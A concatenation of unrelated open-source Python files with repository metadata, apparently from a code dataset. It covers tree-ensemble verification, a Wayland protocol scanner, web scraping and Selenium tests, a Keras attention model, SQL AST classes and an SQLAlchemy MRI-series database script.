return len(self.model.estimators_) # actually instantiated
def get_tree(self, tree_idx):
# FIXME: check if correct for regressor case
return self.model.estimators_[tree_idx, self.get_label()].tree_
#===========================================================================
# Note that the condition is different than xgboost...
#===========================================================================
def get_node_condition(self, tree_idx, node_idx, val):
if (isinstance(val , float) and (val == float("-inf"))): return True
if (isinstance(val , float) and (val == float("inf"))): return False
return (val <= self.get_node_threshold(tree_idx, node_idx))
def get_true_child(self, tree_idx, node_idx):
return self.get_tree(tree_idx).children_left[node_idx]
def get_false_child(self, tree_idx, node_idx):
return self.get_tree(tree_idx).children_right[node_idx]
def is_leaf(self, tree_idx, node_idx):
a_tree = self.get_tree(tree_idx)
feature_idx = a_tree.feature[node_idx]
if (feature_idx == None): return True
# else
#
# old version works but doesn't parse well...
# return (feature_idx == _tree.TREE_UNDEFINED)
return (a_tree.children_left[node_idx] == a_tree.children_right[node_idx])
def get_node_value(self, tree_idx, node_idx):
return self.get_tree(tree_idx).value[node_idx][0][0]
def get_node_threshold(self, tree_idx, node_idx):
return self.get_tree(tree_idx).threshold[node_idx]
#
class XgbFormalRegressorModel(IDecisionTreeEnsembleFormalRegressorModel):
'''
xgboost implementation
'''
def __init__(self, solver_mng, metadata, xgb_regression_model, class_label,model_id):
IDecisionTreeEnsembleFormalRegressorModel.__init__(self, solver_mng, metadata, class_label)
self.model = xgb_regression_model;
self.trees = self._extract_trees_workaround(parse_trees(self.model))
# only now we know the amount of trees --> finishing the super constructor
IDecisionTreeEnsembleFormalRegressorModel._close_construction(self,model_id)
def _extract_trees_workaround(self, all_trees):
ret_trees = []
for tree_idx in range(len(all_trees)):
# FIXME: not sure it will work well for regressor
if ((tree_idx % self.get_num_classes()) == self.get_label()):
ret_trees.append(all_trees[tree_idx])
return ret_trees
def get_base_predictor(self):
return 0
def get_learning_rate(self):
# not really relevant... multiplying by 1
return 1 # self.model.learning_rate
def get_num_trees(self):
return len(self.trees)
def get_tree(self, tree_idx):
return self.trees[tree_idx]
#===========================================================================
# Note that the condition is different than sklearn...
#===========================================================================
def get_node_condition(self, tree_idx, node_idx, val):
if (isinstance(val , float) and (val == float("-inf"))): return True
if (isinstance(val , float) and (val == float("inf"))): return False
return (val < self.get_node_threshold(tree_idx, node_idx))
def get_true_child(self, tree_idx, node_idx):
return self.get_tree(tree_idx).true_children[node_idx]
def get_false_child(self, tree_idx, node_idx):
return self.get_tree(tree_idx).false_children[node_idx]
def is_leaf(self, tree_idx, node_idx):
feature_idx = self.get_tree(tree_idx).feature[node_idx]
return (feature_idx == None)
def get_node_value(self, tree_idx, node_idx):
# FIXME: bug! not the threshold!!
return self.get_tree(tree_idx).threshold[node_idx]
def get_node_threshold(self, tree_idx, node_idx):
return self.get_tree(tree_idx).threshold[node_idx]
#==============================================================================
# ensembles interfaces
#==============================================================================
def gb_classification(solver_mng, metadata, model, model_id=1,cmp_label=None, obs_vec=None, obs_label=None, epsilon=float('inf'), min_val=float('-inf'), max_val=float('inf')):
#print("building gb_classification...")
formal_model = []
for class_label in range(metadata.get_num_labels()):
if (isinstance(model, GradientBoostingClassifier)):
formal_model.append(SklFormalRegressorModel(solver_mng, metadata, model, class_label,model_id))
elif(isinstance(model, XGBClassifier)):
formal_model.append(XgbFormalRegressorModel(solver_mng, metadata, model, class_label,model_id))
else:
raise VeriGbError("unknown model type '" + str(type(model)) + "'")
if (cmp_label == None):
cmp_label = []
for i in range(metadata.get_num_labels()): cmp_label.append(i)
# cmp must have at least obs_label
if (obs_label != None): cmp_label.append(obs_label)
elif (epsilon != float('inf')):
raise VeriGbError("epsilon cannot be set if an observation is not given")
if (len(cmp_label) <= 1):
raise VeriGbError("Must have at least 2 labels to compare between")
    # print(formal_model)  # debug output
class_alt = False
OUTPUT_VAR = solver_mng.get_output_var()
for l1 in cmp_label: class_alt = Or(class_alt, (OUTPUT_VAR == l1))
#
mc_model = And(True, class_alt)
for l1 in cmp_label:
mc_model = And(mc_model, formal_model[l1].get_ensemble_expr(obs_vec, epsilon, min_val, max_val, optimize_l1=False,i=1))
l1_gt_others = True
for l2 in cmp_label:
if (l1 == l2): continue
l1_gt_others = And(l1_gt_others, formal_model[l1].get_gt_constraints(formal_model[l2]))
mc_model = And(mc_model, ((OUTPUT_VAR == l1) == l1_gt_others))
# print("======================== mc_model:\n" + str(mc_model))
return mc_model
def gb_binary_classification(solver_mng, metadata, model, obs_vec, obs_label,model_id=1 ,
epsilon=float('inf'), min_val=float('-inf'), max_val=float('inf')):
#print("building gb_binary_classification...")
#obs label is the original
#cmp_lable label to compare to
formal_model = None
if (isinstance(model, GradientBoostingClassifier)):
        formal_model = SklFormalRegressorModel(solver_mng, metadata, model, 0, model_id)
elif(isinstance(model, XGBClassifier)):
formal_model = XgbFormalRegressorModel(solver_mng, metadata, model, 0,model_id)
else:
raise VeriGbError("unknown model type '" + str(type(model)) + "'")
#mc_model = formal_model.get_ensemble_expr(obs_vec, epsilon, min_val, max_val, optimize_l1=False)
#OUTPUT_VAR = solver_mng.get_output_var()
#mc_model = And(mc_model, ((OUTPUT_VAR == 1) == formal_model.get_ge_zero()))
#mc_model = And(mc_model, ((OUTPUT_VAR == 0) == Not(formal_model.get_ge_zero())))
return formal_model
def rf_classification():
pass
def rf_unsupervised():
pass
#==============================================================================
# def iff_z3(a, b):
# return And(Implies(a, b), Implies(b, a))
|
[
"maayan.goldstein@nokia-bell-labs.com"
] |
maayan.goldstein@nokia-bell-labs.com
|
97469d166ee1c11a75b78a43d37270ea43a50214
|
172e4a0a42af7b6031e0755863765882844c12c9
|
/pywayland/scanner/event.py
|
d2aa79e4d849e1f326ed15c28920f284ee954f21
|
[
"Apache-2.0"
] |
permissive
|
green-green-avk/pywayland
|
7020da05d46596a62185ad69e59c0e22633d4681
|
65aae61d5df320dc0c39d46761e44a4e34137bb2
|
refs/heads/main
| 2023-02-27T22:50:10.883373
| 2020-12-27T21:40:45
| 2020-12-27T21:40:45
| 337,197,445
| 1
| 0
|
Apache-2.0
| 2021-02-08T20:14:20
| 2021-02-08T20:14:19
| null |
UTF-8
|
Python
| false
| false
| 2,231
|
py
|
# Copyright 2015 Sean Vig
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
from typing import Iterator
import xml.etree.ElementTree as ET
from .argument import Argument
from .description import Description
from .method import Method
from .printer import Printer
@dataclass(frozen=True)
class Event(Method):
"""Scanner for event objects (server-side method)
Required attributes: `name`
Optional attributes: `since`
    Child elements: `description` and `arg`
"""
method_type = "event"
@classmethod
def parse(cls, element: ET.Element) -> "Event":
name = cls.parse_attribute(element, "name")
if name in ("global", "import"):
name += "_"
return cls(
name=name,
since=cls.parse_optional_attribute(element, "since"),
description=cls.parse_optional_child(element, Description, "description"),
arg=cls.parse_repeated_child(element, Argument, "arg"),
)
@property
def method_args(self) -> Iterator[str]:
"""Generator of the arguments to the method
All arguments to be sent to `._post_event` must be passed in
"""
for arg in self.arg:
yield arg.name
def output_doc_params(self, printer: Printer) -> None:
"""Aguments documented as parameters
All arguments are event parameters.
"""
for arg in self.arg:
arg.output_doc_param(printer)
def output_body(self, printer: Printer, opcode: int) -> None:
"""Output the body of the event to the printer"""
args = ", ".join([str(opcode)] + list(self.method_args))
printer("self._post_event({})".format(args))
|
[
"sean.v.775@gmail.com"
] |
sean.v.775@gmail.com
|
634619ac997537061052ec76d0a879e9283ea4bd
|
3d919114df49b96e31fa7fed767707a01f5f1a0f
|
/08 Navigating with Beautiful Soup - Going Up/028 parents.py
|
3d2b4c4ffda2434b3c2e85c1e51752b2d006a676
|
[] |
no_license
|
ranganadh234/webscraping
|
2233590e6a6b6664eb70ae1730580659bcb56955
|
7fa11e465e6f74dbdb2918cb81b871916fe6c053
|
refs/heads/master
| 2020-12-15T08:05:59.120975
| 2020-01-20T06:48:56
| 2020-01-20T06:48:56
| 235,036,259
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
from bs4 import BeautifulSoup
def read_file():
file = open('three_sisters.html')
data = file.read()
file.close()
return data
soup = BeautifulSoup(read_file(),'lxml')
# .parents returns a generator of the tag's parents
link = soup.a
for parent in link.parents:
print(parent.name)
|
[
"ranganadh234@gmail.com"
] |
ranganadh234@gmail.com
|
fa5d3b27d655bc9a4a771ba01e6247b8cf74815b
|
e85ee961a71abfe3892d266b34529ad4600e6b42
|
/features/steps/User can select color.py
|
78c6d3f5e9363cd3dcf7443bc8f9b33c0e1e39a1
|
[] |
no_license
|
kazijesin/gettop-automation
|
80efdabe971426dd0fced088951c09f19ce157eb
|
be30249f11e810495ef6e247afd5a4ad7f468d3d
|
refs/heads/main
| 2023-07-05T01:59:59.573213
| 2021-08-15T18:37:46
| 2021-08-15T18:37:46
| 392,508,619
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 981
|
py
|
from selenium.webdriver.common.by import By
from behave import given, when, then
from selenium import webdriver
@given('Open Amazon product B07F2N8KWH page')
def open_amazon_product_page(context):
    context.driver.get('https://www.amazon.com/dp/B07F2N8KWH?th=1')
@then('verify user can click through colors')
def verify_user_click_color(context):
expected_colors = ['Black', 'Blue', 'Gray', 'Grey Pineapple', 'Grey Plaid', 'Khaki', 'Khaki Anchor', 'Khaki Plaid', 'Navy', 'Navy Anchor', 'Navy Plaid', 'Olive', 'Olive Plaid', 'Silver', 'Stone', 'Washed Red','Washed Red Lobster']
color_webelements = context.driver.find_elements(By.CSS_SELECTOR,"#variation_color_name li")
for i in range(len(color_webelements)):
color_webelements[i].click()
actual_text = context.driver.find_element(By.CSS_SELECTOR, "#variation_color_name span.selection").text
assert actual_text == expected_colors[i], f'Error, color is {actual_text}, but expected {expected_colors[i]}'
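# Note (assumption, not stated in this file): context.driver must be created before these
# steps run, typically in behave's features/environment.py, e.g.:
#     def before_all(context):
#         context.driver = webdriver.Chrome()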
|
[
"kazijesin@gmail.com"
] |
kazijesin@gmail.com
|
64ee16abcbe29058926e42f640c79595f3284361
|
6014755d8a4261336c06210ab9b8f9c783e10d28
|
/src/model/attention_model.py
|
e6eea616d4d5ca4037e6f5bedd0415dcf95a9b59
|
[] |
no_license
|
yupeihua/SOHU_competition
|
33775357ff15c8c924400d33f99158d94a0d5737
|
168fb3f0f382ab95a4116d639c2c1de886acdfc2
|
refs/heads/master
| 2020-03-22T19:09:49.095217
| 2018-07-11T01:53:10
| 2018-07-11T01:53:10
| 140,510,033
| 8
| 0
| null | 2018-07-11T02:18:26
| 2018-07-11T02:18:25
| null |
UTF-8
|
Python
| false
| false
| 2,518
|
py
|
# -*- coding: utf-8 -*-
"""
# @Time : 2018/7/6 11:50 AM
# @Author : zhanzecheng
# @File : attention_model.py
# @Software: PyCharm
"""
from keras.layers import *
from keras.models import *
from model.model_component import AttentionWeightedAverage
from model.model_basic import BasicModel
from keras.utils.vis_utils import plot_model
class AttentionModel(BasicModel):
def __init__(self, maxLen, ocrLen, max_features, init_embedding_matrix, name='basicModel', num_flods=4, batch_size=64):
BasicModel.__init__(self, maxLen, ocrLen, max_features, init_embedding_matrix, name='Attention', num_flods=num_flods, batch_size=batch_size)
def create_model(self):
recurrent_units = 60
main_input = Input(shape=(self.maxLen,), name='news')
embedding = Embedding(self.max_features, self.embed_size, weights=[self.embedding_matrix], trainable=False, name='embedding')
embedding_layer = embedding(main_input)
embedding_layer = SpatialDropout1D(0.25)(embedding_layer)
rnn_1 = Bidirectional(GRU(recurrent_units, return_sequences=True, dropout=0.1, recurrent_dropout=0.1))(
embedding_layer)
x = Bidirectional(GRU(recurrent_units, return_sequences=True, dropout=0.1, recurrent_dropout=0.1))(rnn_1)
# x = concatenate([rnn_1, rnn_2], axis=2)
last = Lambda(lambda t: t[:, -1], name='last')(x)
maxpool = GlobalMaxPooling1D()(x)
attn = AttentionWeightedAverage()(x)
average = GlobalAveragePooling1D()(x)
ocr_input = Input(shape=(self.ocrLen,), name='ocr')
ocr_embedding_layer = embedding(ocr_input)
ocr_embedding_layer = SpatialDropout1D(0.25)(ocr_embedding_layer)
ocr_rnn_1 = Bidirectional(GRU(recurrent_units // 2, return_sequences=True, dropout=0.1, recurrent_dropout=0.1))(
ocr_embedding_layer)
ocr_rnn_2 = Bidirectional(GRU(recurrent_units // 2, return_sequences=True, dropout=0.1, recurrent_dropout=0.1))(ocr_rnn_1)
ocr_maxpool = GlobalMaxPooling1D()(ocr_rnn_2)
ocr_attn = AttentionWeightedAverage()(ocr_rnn_2)
all_views = concatenate([last, maxpool, attn, average, ocr_maxpool, ocr_attn], axis=1)
x = Dropout(0.5)(all_views)
dense2 = Dense(3, activation="softmax")(x)
res_model = Model(inputs=[main_input, ocr_input], outputs=dense2)
        plot_model(res_model, to_file="model.png", show_shapes=True)
# res_model = Model(inputs=[main_input], outputs=main_output)
return res_model
|
[
"50673223@qq.com"
] |
50673223@qq.com
|
2b6a129f0d9522336f6edb213499ad4c61064e74
|
a5ba631dddaf2912c309601f8fbdd3c5b494fe20
|
/src/command_modules/azure-cli-lab/azure/cli/command_modules/lab/sdk/devtestlabs/models/subscription_notification_properties.py
|
b9fc92eb180e232ec8a8f95a491cf06d9dbd3a0d
|
[
"MIT"
] |
permissive
|
saurabsa/azure-cli-old
|
37471020cd2af9a53e949e739643299f71037565
|
f77477a98c9aa9cb55daf5b0d2f410d1455a9225
|
refs/heads/master
| 2023-01-09T04:00:15.642883
| 2018-04-23T21:40:04
| 2018-04-23T21:40:04
| 130,759,501
| 0
| 0
|
NOASSERTION
| 2022-12-27T14:59:06
| 2018-04-23T21:33:34
|
Python
|
UTF-8
|
Python
| false
| false
| 748
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# coding: utf-8
# pylint: skip-file
from msrest.serialization import Model
class SubscriptionNotificationProperties(Model):
"""SubscriptionNotificationProperties.
:param tenant_id:
:type tenant_id: str
"""
_attribute_map = {
'tenant_id': {'key': 'tenantId', 'type': 'str'},
}
def __init__(self, tenant_id=None):
self.tenant_id = tenant_id
|
[
"saurabsa@microsoft.com"
] |
saurabsa@microsoft.com
|
a9c5c9383436579ca30acdc3b1563e3b8454991c
|
5256661b302738acede0e6d79f6d2cb4c7de9b99
|
/alien.py
|
a80b6805204f2207baeb384a69015683abeaed54
|
[] |
no_license
|
ArtemiiLulevich/Python_My_game
|
0f80f91fa4d814b8080e596f176f48060987433d
|
fb337b6427b44f9a485d04a4a1a2d9badf33cdd4
|
refs/heads/master
| 2022-07-10T17:49:03.160551
| 2019-11-02T16:10:43
| 2019-11-02T16:10:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 893
|
py
|
import pygame
from pygame.sprite import Sprite
class Alien(Sprite):
"""Class that present one alian"""
def __init__(self, ai_setting, screen):
super(Alien, self).__init__()
self.screen = screen
self.ai_setting = ai_setting
self.image = pygame.image.load('img/Alien_ref.png')
self.rect = self.image.get_rect()
self.rect.x = self.rect.width
self.rect.y = self.rect.height
self.x = float(self.rect.x)
def blitalien(self):
self.screen.blit(self.image, self.rect)
def update(self):
self.x += (self.ai_setting.alien_speed_factor * self.ai_setting.fleet_direction)
self.rect.x = self.x
def check_edge(self):
screen_rect = self.screen.get_rect()
if self.rect.right >= screen_rect.right:
return True
elif self.rect.left <= 0:
return True
|
[
"artemii.lulevich@gmail.com"
] |
artemii.lulevich@gmail.com
|
5a6f4091193bccde341bc3a84853bb66ed6af836
|
4ec6ed4ebcb9346042669e6aa03be0e502ed48b3
|
/leetcode/degree-of-an-array.py
|
d2e83b90bea0069a9fd08652021f2629686a76c3
|
[] |
no_license
|
shonihei/road-to-mastery
|
79ed41cb1ad0dc2d0b454db2ccc7dd9567b03801
|
312bdf5101c3c1fc9a4d0b6762b5749ca57efe08
|
refs/heads/master
| 2021-01-22T19:59:17.038641
| 2017-11-16T15:21:55
| 2017-11-16T15:21:55
| 85,266,186
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,055
|
py
|
"""
Given a non-empty array of non-negative integers nums, the degree of this array is defined as the maximum frequency of any one of its elements.
Your task is to find the smallest possible length of a (contiguous) subarray of nums, that has the same degree as nums.
Example 1:
Input: [1, 2, 2, 3, 1]
Output: 2
Explanation:
The input array has a degree of 2 because both elements 1 and 2 appear twice.
Of the subarrays that have the same degree:
[1, 2, 2, 3, 1], [1, 2, 2, 3], [2, 2, 3, 1], [1, 2, 2], [2, 2, 3], [2, 2]
The shortest length is 2. So return 2.
Example 2:
Input: [1,2,2,3,1,4,2]
Output: 6
"""
def findShortestSubArray(nums):
"""
:type nums: List[int]
:rtype: int
"""
d = {}
for i in range(len(nums)):
try:
d[nums[i]][0] += 1
d[nums[i]][2] = i
except KeyError:
d[nums[i]] = [1, i, i]
min_len = float('inf')
max_freq = 0
for k, v in d.items():
if v[0] > max_freq:
min_len = v[2] - v[1] + 1
max_freq = v[0]
if v[0] == max_freq:
if v[2] - v[1] + 1 < min_len:
min_len = v[2] - v[1] + 1
return min_len
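# Quick check against the examples in the docstring above (added for illustration):
# findShortestSubArray([1, 2, 2, 3, 1])       -> 2
# findShortestSubArray([1, 2, 2, 3, 1, 4, 2]) -> 6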
|
[
"shonihei@gmail.com"
] |
shonihei@gmail.com
|
1e0994f4e3d42c65bfbfc8138c22de4a829413f7
|
d6aba9e818c6f6d021d8407cba97f21473b53f17
|
/sdnve_plugin/sdnve-plugin-icehouse/plugin-archive/int_support/neutron-sdnve-agent
|
b1b3a995b3a9f3b6c019cec5fd9a86d5b9c62ba7
|
[] |
no_license
|
yeasy/sc_demo
|
14a064813b3bb8673b25d90c7effeec00f9574cc
|
44493a6a3a3f74c4bef1b3a18dc5b0bba6f827fb
|
refs/heads/master
| 2020-04-22T06:12:02.262764
| 2014-10-29T05:36:19
| 2014-10-29T05:36:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 814
|
#!/usr/bin/env python
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Red Hat
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import sys
sys.path.insert(0, os.getcwd())
from neutron.plugins.ibm.agent.sdnve_neutron_agent import main
main()
|
[
"yangbaohua@gmail.com"
] |
yangbaohua@gmail.com
|
|
84ef810c5c406c0e804b8c3f86ef8d9b90a780d6
|
38a80a057aab8ebd0f26ea347a87fa3afb2432eb
|
/dedict.py
|
434924084c650b55127ab0ad19a8f62429ca661d
|
[] |
no_license
|
aped/dict_tools
|
3d0c6544c2fafc961905eae4088766996ee6f106
|
bb038055ca386f7fe31f3b27a5cafb2c94c2d279
|
refs/heads/master
| 2020-03-30T20:41:52.884110
| 2013-03-12T00:21:27
| 2013-03-12T00:21:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 298
|
py
|
#!/usr/bin/env python2.7
""" Takes a nested dict structure and turns it into a list of dicts,
merging the old highest-level keys into the lower dicts.
"""
def dedict(adict, new_key):
lst = []
for k,v in adict.items():
v[new_key] = k
lst.append(v)
return lst
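# Illustrative example (not in the original file; list order follows Python 2.7 dict iteration order):
# dedict({'alice': {'age': 30}, 'bob': {'age': 25}}, 'name')
# => [{'age': 30, 'name': 'alice'}, {'age': 25, 'name': 'bob'}]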
|
[
"andrew.r.pedelty@gmail.com"
] |
andrew.r.pedelty@gmail.com
|
12870699608e9ba17b7effdeee942a10a6e3a251
|
6b0c4f71685bf538e00ad97582d5333096af242c
|
/lacquer/tree/grouping.py
|
999a8765cf396633938555790ba34c603fad8865
|
[] |
no_license
|
lsst-dm/lacquer
|
b487152094d222263fdfdfaf2f8b4095d3a85897
|
c2e8b9ab0cdcc4e018782cb81f21733a6da3f2d4
|
refs/heads/main
| 2023-07-21T11:36:23.412905
| 2023-07-10T00:50:05
| 2023-07-10T00:50:05
| 55,021,566
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 960
|
py
|
from .node import Node
class GroupingElement(Node):
def __init__(self, line=None, pos=None):
super(GroupingElement, self).__init__(line, pos)
# def enumerate_grouping_sets(self):
# pass
class GroupingSets(GroupingElement):
def __init__(self, line=None, pos=None, sets=None):
super(GroupingSets, self).__init__(line, pos)
self.sets = sets
# def enumerate_grouping_sets(self):
# pass
# def __str__(self):
# """
# return MoreObjects.toStringHelper(this).add("sets", sets).toString();
# """
class SimpleGroupBy(GroupingElement):
def __init__(self, line=None, pos=None, columns=None):
super(SimpleGroupBy, self).__init__(line, pos)
self.columns = columns
# def enumerate_grouping_sets(self):
# pass
# def __str__(self):
# """
# return MoreObjects.toStringHelper(this).add("columns", columns).toString();
# """
|
[
"bvan@slac.stanford.edu"
] |
bvan@slac.stanford.edu
|
132b194edad5e920576624ca8e253ca557d62443
|
47b621365f3c300e02ca584c546ffa221e2ad448
|
/scrapping/__init__.py
|
a75abf687a1d9603c8e19ce78ceabadd65e329ee
|
[
"MIT"
] |
permissive
|
aipyth/scrapping
|
42d0e8eae97f5789609358a778c9f0d3f1b45f99
|
a7746c1b15a3ff3cffc4fc011d1a4280a03e3ced
|
refs/heads/master
| 2020-06-26T03:23:55.519636
| 2019-07-29T19:09:12
| 2019-07-29T19:09:12
| 199,511,809
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 112
|
py
|
from .requests import Request, Method
from . import data_handler as DataHandlers
from . import spider as Spider
|
[
"ipython10@gmail.com"
] |
ipython10@gmail.com
|
c3c5970408d92c53453e9594b8d80ca37c0bc232
|
5157b08ea91d2f313fcabf8497a2cf7722b1f771
|
/learn/test.py
|
9a25a7a3c9e583bd11b6ae40c5e5029c44b2c212
|
[] |
no_license
|
ay27/MatrixFactorization
|
c829347f59d9a995a1c299753c3d5a06031e2cf1
|
53e0c6aacedd5285804a7c2fb79ece8642393e2d
|
refs/heads/master
| 2021-05-04T11:00:33.098096
| 2017-02-01T10:16:12
| 2017-02-01T10:16:12
| 53,820,648
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 101
|
py
|
# Created by ay27 at 16/3/25
def ff(x):
return {'aa':x, 'a': x*x}
obj = ff(2)
print(obj['a'])
|
[
"me@ay27.pw"
] |
me@ay27.pw
|
b373450530b1e02b06734dca333f4f44b9a97f91
|
7e8bf70d752466b326307b71f9c2d211cfbab611
|
/SQL.py
|
34c5bdbf7db7f488da1a18cfdd1dcfd006089b68
|
[] |
no_license
|
cgallego/Get_Anonymized_Accession_annot2db
|
e814024ee220909ae56f65116900442a3aa01816
|
805d0c07f9363e3ac4d57b9bf7d1820ed25ee13a
|
refs/heads/master
| 2021-01-02T09:25:52.442744
| 2015-06-29T19:01:42
| 2015-06-29T19:01:42
| 32,989,228
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,239
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 13 10:36:51 2013
@author: Karen Klassen
"""
from dictionaries import biomatrix_user, biomatrix_password, biomatrix_host,\
biomatrix_database, program_loc
import instances
import os
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.dialects.postgresql import ARRAY
Base=declarative_base()
class Table(Base):
"""
Represents the tbl_pt_mri_series table. This is the one that is filled by
the later code.
"""
__tablename__='tbl_pt_mri_series'
pt_mri_series_id=sqlalchemy.Column(sqlalchemy.Integer,\
primary_key=True)
exam_img_dicom_txt=sqlalchemy.Column(sqlalchemy.Text)
series_uid_txt=sqlalchemy.Column(sqlalchemy.Text)
series_desc_txt=sqlalchemy.Column(sqlalchemy.Text)
translation_txt=sqlalchemy.Column(sqlalchemy.Text)
type_int=sqlalchemy.Column(sqlalchemy.Integer)
processed_yn=sqlalchemy.Column(sqlalchemy.Integer)
protocol_txt=sqlalchemy.Column(sqlalchemy.Text)
te_double=sqlalchemy.Column(sqlalchemy.Float)
tr_double=sqlalchemy.Column(sqlalchemy.Float)
pt_position_int=sqlalchemy.Column(sqlalchemy.Integer)
side_txt=sqlalchemy.Column(sqlalchemy.Text)
subtracted_yn=sqlalchemy.Column(sqlalchemy.Integer)
registered_yn=sqlalchemy.Column(sqlalchemy.Integer)
fat_saturated_yn=sqlalchemy.Column(sqlalchemy.Integer)
three_d_yn=sqlalchemy.Column(sqlalchemy.Integer)
contrast_yn=sqlalchemy.Column(sqlalchemy.Integer)
img_int_array=sqlalchemy.Column(ARRAY(sqlalchemy.Integer))
voxel_spc_double_arry=sqlalchemy.Column(ARRAY(sqlalchemy.Numeric))
start_time=sqlalchemy.Column(sqlalchemy.Time)
length_of_time_arry=sqlalchemy.Column(ARRAY(sqlalchemy.Integer))
img_orientation_int=sqlalchemy.Column(sqlalchemy.Integer)
orientation_txt=sqlalchemy.Column(sqlalchemy.Text)
a_no_txt=sqlalchemy.Column(sqlalchemy.Text)
study_description_txt=sqlalchemy.Column(sqlalchemy.Text)
updated_on=sqlalchemy.Column(sqlalchemy.DateTime,\
default=sqlalchemy.func.now()) #func.now causes auto-update
def __init__(self,obj):
"""
Creates a Table object (a row) having the same values as a Series
object. Takes in a single Series object.
"""
self.exam_img_dicom_txt=obj.DICOMnum
self.series_uid_txt=obj.UID
self.series_desc_txt=obj.series
self.study_description_txt=obj.study
self.translation_txt=obj.translation
self.type_int=obj.type
self.processed_yn=obj.processed
self.protocol_txt=obj.protocol_name
self.te_double=obj.te
self.tr_double=obj.tr
self.pt_position_int=obj.position
self.side_txt=obj.side
self.subtracted_yn=obj.sub
self.registered_yn=obj.reg
self.fat_saturated_yn=obj.fat
self.three_d_yn=obj.dimension
self.contrast_yn=obj.contrast
self.img_int_array=obj.isize
self.voxel_spc_double_arry=obj.vdim
self.start_time=obj.intime
self.length_of_time_arry=obj.timediffer
self.img_orientation_int=obj.orient
self.orientation_txt=obj.ormatrix
self.a_no_txt=obj.accnum
# not a part of the pipeline
class Exam(Base):
"""
Represents the tbl_pt_exam table
"""
__tablename__='tbl_pt_exam'
pt_exam_id=sqlalchemy.Column(sqlalchemy.Integer,primary_key=True)
exam_img_dicom_txt=sqlalchemy.Column(sqlalchemy.Integer)
def run_code(examID, exam_loc):
"""
Sets up connection with Biomatrix, creates rows and writes them to the
table (commits them).
Takes in examID and exam_loc as strings.
"""
engine='postgresql+psycopg2://'+biomatrix_user+':'+biomatrix_password+'@'\
+biomatrix_host+'/'+biomatrix_database
engine1=sqlalchemy.create_engine(engine)
Base.metadata.create_all(engine1)
Session=sessionmaker(bind=engine1)
session=Session()
objs=instances.objects(examID,exam_loc)
    # this section would be used if this table were linked to the tbl_pt_exam table
"""
#finds primary_key for matching DICOM number to link the two tables
q=session.query(Exam).all()
for x in q:
if x.exam_img_dicom_txt==objs[0].DICOMnum:
key=x.pt_exam_id
break
"""
#checks for duplicates and creates rows
rows=[]
for i in objs:
duplicates(engine1,i)
rows.append(Table(i))
print 'Writing to database...'
session.add_all(rows)
session.commit()
os.chdir(program_loc)
new=open('Usedlist.txt','a') #records examIDs already done
new.write('['+str(examID)+'] \n')
new.close()
#disconnects from database
session.close()
engine1.dispose()
return
def duplicates(engine,single):
"""
Assumes Series UID is unique.
Checks tbl_pt_mri_series to make sure that no duplicates get created.
Takes engine as a SQLAlchemy object and single as a Series object.
Errors out if it finds a duplicate.
"""
Session=sessionmaker(bind=engine)
session=Session()
rows=session.query(Table).all()
for r in rows:
if r.series_uid_txt==single.UID:
raise RuntimeError('Series is already in table by UID')
if r.a_no_txt==single.accnum:
raise RuntimeError('Series is already in table by Accession')
return
def testing():
"""
Used to see which accession numbers are on the database. Also gives the
total number of studies on the database.
"""
engine='postgresql+psycopg2://'+biomatrix_user+':'+biomatrix_password+'@'\
+biomatrix_host+'/'+biomatrix_database
engine1=sqlalchemy.create_engine(engine)
Base.metadata.create_all(engine1)
Session=sessionmaker(bind=engine1)
session=Session()
q=session.query(Table).all()
results=[]
for x in q:
results.append(x.a_no_txt)
thing=set(results)
thing2=list(thing)
thing2.sort()
for i in thing2:
print i
print 'Total entered: '+str(len(thing2))
return
def testing2():
"""
Prints all entries for a given DICOM number.
"""
engine='postgresql+psycopg2://'+biomatrix_user+':'+biomatrix_password+'@'\
+biomatrix_host+'/'+biomatrix_database
engine1=sqlalchemy.create_engine(engine)
Base.metadata.create_all(engine1)
Session=sessionmaker(bind=engine1)
session=Session()
q=session.query(Table).all()
for x in q:
if x.exam_img_dicom_txt=='16385':
#print x.pt_mri_series_id
print x.exam_img_dicom_txt
print x.series_uid_txt
print x.series_desc_txt
print x.translation_txt
#print x.type_int
#print x.processed_yn
#print x.protocol_txt
#print x.te_double
#print x.tr_double
#print x.pt_position_int
#print x.side_txt
#print x.subtracted_yn
#print x.registered_yn
print x.fat_saturated_yn
#print x.three_d_yn
#print x.contrast_yn
#print x.img_int_array
#print x.voxel_spc_double_arry
#print x.start_time
#print x.length_of_time_arry
#print x.img_orientation_int
#print x.orientation_txt
#print x.updated_on
return
def testing3():
"""
Tests something else
"""
engine='postgresql+psycopg2://'+biomatrix_user+':'+biomatrix_password+'@'\
